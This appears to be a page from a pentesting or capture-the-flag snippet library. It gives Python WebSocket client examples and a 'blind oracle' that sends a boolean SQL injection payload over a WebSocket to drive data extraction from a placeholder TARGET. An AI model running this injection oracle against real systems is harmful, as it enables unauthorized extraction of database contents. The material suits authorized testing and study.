WebSockets

Synchronous and asyncio WebSocket clients, and a blind oracle that drives extraction over a single socket.

WebSocket client — sync (websocket-client)

GAP filler. Synchronous API, the easiest for scripting. Authentication passes via Cookie/Origin headers just like requests.

import websocket   # pip install websocket-client

ws = websocket.create_connection(
    "ws://TARGET/socket",
    header=["Cookie: session=ABC", "Origin: http://TARGET"]
)
ws.send('{"action":"login","username":"admin","password":"x"}')
print(ws.recv())
ws.close()

_{Find by: websocket, ws, websocket-client, create_connection, send, recv, realtime, socket, gap, cookie, origin, headers}

WebSocket client — asyncio (websockets)

The asyncio library; better for interleaved send/recv or many concurrent sockets.

import asyncio, websockets   # pip install websockets

async def main():
    async with websockets.connect("ws://TARGET/ws",
                                   extra_headers={"Cookie": "session=ABC"}) as ws:
        await ws.send("ping")
        print(await ws.recv())

asyncio.run(main())

_{Find by: websocket, ws, websockets, asyncio, async, await, connect, send, recv, gap, coroutine, stream}

WebSocket blind oracle (reuse one socket)

This oracle plugs into the blind-dump harness to run SQLi/NoSQLi over a WebSocket sink. Keeping the socket open improves speed.

import websocket, json

ws = websocket.create_connection("ws://TARGET/socket")

def oracle(condition):
    ws.send(json.dumps({"search": f"x' AND ({condition}) -- -"}))
    resp = ws.recv()
    return "No results" not in resp     # True => condition held

# from blind-harness:  blind_dump(oracle, len_cond, char_cond)

_{Find by: websocket, ws, blind, oracle, injection over websocket, boolean, extract, dump, keep alive, gap, persistent connection}

Utils Concurrency & Infra